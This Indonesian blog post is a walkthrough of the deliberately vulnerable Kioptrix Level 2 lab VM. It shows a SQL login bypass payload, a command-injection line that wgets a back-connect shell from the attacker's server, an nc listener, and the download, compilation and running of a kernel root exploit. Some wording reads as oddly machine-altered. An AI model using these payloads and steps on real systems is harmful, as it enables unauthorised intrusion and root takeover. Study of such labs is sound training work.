Kioptrix Level 2 - Command Injection And Server Rooting
Monday, September 20, 2021
Add Comment
Kali ini saya akan menulis pembahasan dari Kioptrix Level 2 Challenge. Kioptrix sendiri ialah Oracle VM Image yang dirancang khusus untuk mendalami dasar dasar dari keamanan website dan jaringan. Kaprikornus OS nya memang didesain vulnerable. Goal dari challenge Kioptrix sendiri ialah mendapat root access dari OS tadi, bagaimanapun cara nya. Sehingga kita bebas untuk masuk melalui celah apapun yang terbuka.
Oke pribadi saja ya. Jalankan di Oracle VM.
nanti tampilanya ibarat ini .
Nah ibarat yang terlihat, disitu kalian tidak sanggup masuk ke OS nya . Harus login . Dan kita tidak tau password nya apa, sehingga untuk mendapat jalan masuk kedalam nya kita harus menemukan celah.
Yep.. saatnya penetrasi.
Sebagai catatan, OS yang saya gunakan ialah Ubuntu yang sudah dilengkapi dengan tools pentest dari BackBox.
Oke, pertama, kita harus tau IP dari Kioptrix ini terlebih dahulu.
Kita scan via nmap.
uzumaki@linuxsec: $ nmap -sn 192.168.43.1/24
-sn sendiri ialah perintah ping scan, maka akan terlihat host mana saja yang up. Berhubung yang saya gunakan ialah wifi pribadi, sehingga gampang saya ditemukan ip nya.
Setelah itu, buka IP Kioptrix tadi via browser.
Kita coba bypass sql login dengan user dan password '=' 'or'
Ternyata tembus.
Bagi yang belum tau perihal Bypass SQL Login, sanggup baca baca disini :
Saya skip skip saja ya tulisannya. Di tamat goresan pena nanti saya lampirkan video nya jikalau kurang jelas.
Setelah beberapa kali dilakukan percobaan balasannya diketahui kalau selain untuk pelakukan ping, kolom diatas juga sanggup melaksanakan perintah perintah linux.
Tentu saja dengan command injection.
Disini saya akan melaksanakan back connect sehingga saya mengupload BackConnect Shell ke target.
command nya :
;wget http://serverkita/shell.txt -O /tmp/shell.php
Kita mengupload di folder /tmp sebab hanya folder itu yang writable.
Untuk Shell nya silahkan download disini :
Sesuaikan sendiri untuk ip dan port nya.
Selanjutya, kita buka terminal di main OS.
masukkan command :
uzumaki@linuxsec: $ sudo nc -l 1337
1337 ialah port yang saya gunakan untuk back connect . Sama kan dengan yang ada di shell.
Nah , di web Kioptrix nya tadi, masukkan command :
;php /tmp/shell.php
Sesuaikan dengan nama shell mu.
Maka di terminal akan terbuka shell, namun masih regular user.
Sekarang masukkan command uname -a untuk mengetahui versi kernel yang dipakai target.
Nah, kernel yang dipakai tidak mengecewakan sudah tua. jadi kemungkinan ada di Exploit-DB . kalian sanggup cek sendiri di exploit-db dengan memasukkan versi kernel yang tertera.
Berhubung saya punya searchsploit, saya tinggal mencari nya lewat terminal.
bagi yang ingin menginstall sanggup ikuti tutorial dibawah ini :
Oke lanjut, masukkan command :
uzumaki@linuxsec: $ searchsploit kernel 2.6 root
Itu keyword yang saya gunakan untuk mencari localroot kernel 2.6 yang dipakai kioptrix.
Ada banyak output nya. Saya coba yang ring0 Root Exploit.
Lalu kita copy file .c nya ke /var/www/html biar sanggup didownload.
uzumaki@linuxsec: $ cp /path/to/searchsploit/localroot.c /var/www/html/root.c
Selanjutnya dari shell yang didapat dari back connect sebelumnya, kita download dan kita compile exploit tadi.
sh-3.00$ cd /tmp
sh-3.00$ wget http://serverkita/root.c /tmp/root.c
sh-3.00$ gcc root.c -o rootme
sh-3.00$ chmod +x rootme
Lalu kita jalankan exploit nya dengan command :
sh-3.00$ ./rootme
Maka kalian akan masuk ke root.
sh-3.00# whoami
root
Misi terselesaikan..
Bagi yang kurang terang sanggup lihat video dibawah :
Mungkin kurang menantang bagi kalian yang sudah expert di bidang pentesting, tapi sekali lagi tujuan dari Kioptrix sendiri ialah untuk pembelajaran dasar, sehinga lebih diperuntukkan kepada pemula yang ingin tahu bagaimana alur serangan dilakukan.
jadi buat kalian yang masih awam, silahkan mencoba.
Sekian tutorial kali ini, semoga bermanfaat, share juga ke sobat temanmu biar mereka tau.
Sumber https://www.linuxsec.org/
0 Response to "Kioptrix Level 2 - Command Injection And Server Rooting"
Post a Comment
Blog ini merupakan Blog Dofollow, karena beberapa alasan tertentu, sobat bisa mencari backlink di blog ini dengan syarat :
1. Tidak mengandung SARA
2. Komentar SPAM dan JUNK akan dihapus
3. Tidak diperbolehkan menyertakan link aktif
4. Berkomentar dengan format (Name/URL)
NB: Jika ingin menuliskan kode pada komentar harap gunakan Tool untuk mengkonversi kode tersebut agar kode bisa muncul dan jelas atau gunakan tool dibawah "Konversi Kode di Sini!".
Klik subscribe by email agar Anda segera tahu balasan komentar Anda